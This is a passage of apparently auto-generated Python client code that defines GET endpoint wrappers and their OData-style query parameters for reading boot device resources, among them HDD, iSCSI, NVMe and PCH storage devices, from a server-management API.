at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootDeviceBootSecurityResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_device_boot_security_list = _Endpoint(
settings={
'response_type': (BootDeviceBootSecurityResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/DeviceBootSecurities',
'operation_id': 'get_boot_device_boot_security_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_device_boot_security_list
)
def __get_boot_hdd_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.HddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_hdd_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootHddDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_hdd_device_by_moid = _Endpoint(
settings={
'response_type': (BootHddDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/HddDevices/{Moid}',
'operation_id': 'get_boot_hdd_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_hdd_device_by_moid
)
def __get_boot_hdd_device_list(
self,
**kwargs
):
"""Read a 'boot.HddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_hdd_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootHddDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_hdd_device_list = _Endpoint(
settings={
'response_type': (BootHddDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/HddDevices',
'operation_id': 'get_boot_hdd_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_hdd_device_list
)
def __get_boot_iscsi_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.IscsiDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_iscsi_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootIscsiDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_iscsi_device_by_moid = _Endpoint(
settings={
'response_type': (BootIscsiDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/IscsiDevices/{Moid}',
'operation_id': 'get_boot_iscsi_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_iscsi_device_by_moid
)
def __get_boot_iscsi_device_list(
self,
**kwargs
):
"""Read a 'boot.IscsiDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_iscsi_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootIscsiDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_iscsi_device_list = _Endpoint(
settings={
'response_type': (BootIscsiDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/IscsiDevices',
'operation_id': 'get_boot_iscsi_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_iscsi_device_list
)
def __get_boot_nvme_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.NvmeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_nvme_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootNvmeDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_nvme_device_by_moid = _Endpoint(
settings={
'response_type': (BootNvmeDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/NvmeDevices/{Moid}',
'operation_id': 'get_boot_nvme_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_nvme_device_by_moid
)
def __get_boot_nvme_device_list(
self,
**kwargs
):
"""Read a 'boot.NvmeDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_nvme_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootNvmeDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_nvme_device_list = _Endpoint(
settings={
'response_type': (BootNvmeDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/NvmeDevices',
'operation_id': 'get_boot_nvme_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_nvme_device_list
)
def __get_boot_pch_storage_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.PchStorageDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_pch_storage_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootPchStorageDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_pch_storage_device_by_moid = _Endpoint(
settings={
'response_type': (BootPchStorageDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/PchStorageDevices/{Moid}',
'operation_id': 'get_boot_pch_storage_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_pch_storage_device_by_moid
)
def __get_boot_pch_storage_device_list(
self,
**kwargs
):
"""Read a 'boot.PchStorageDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_pch_storage_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
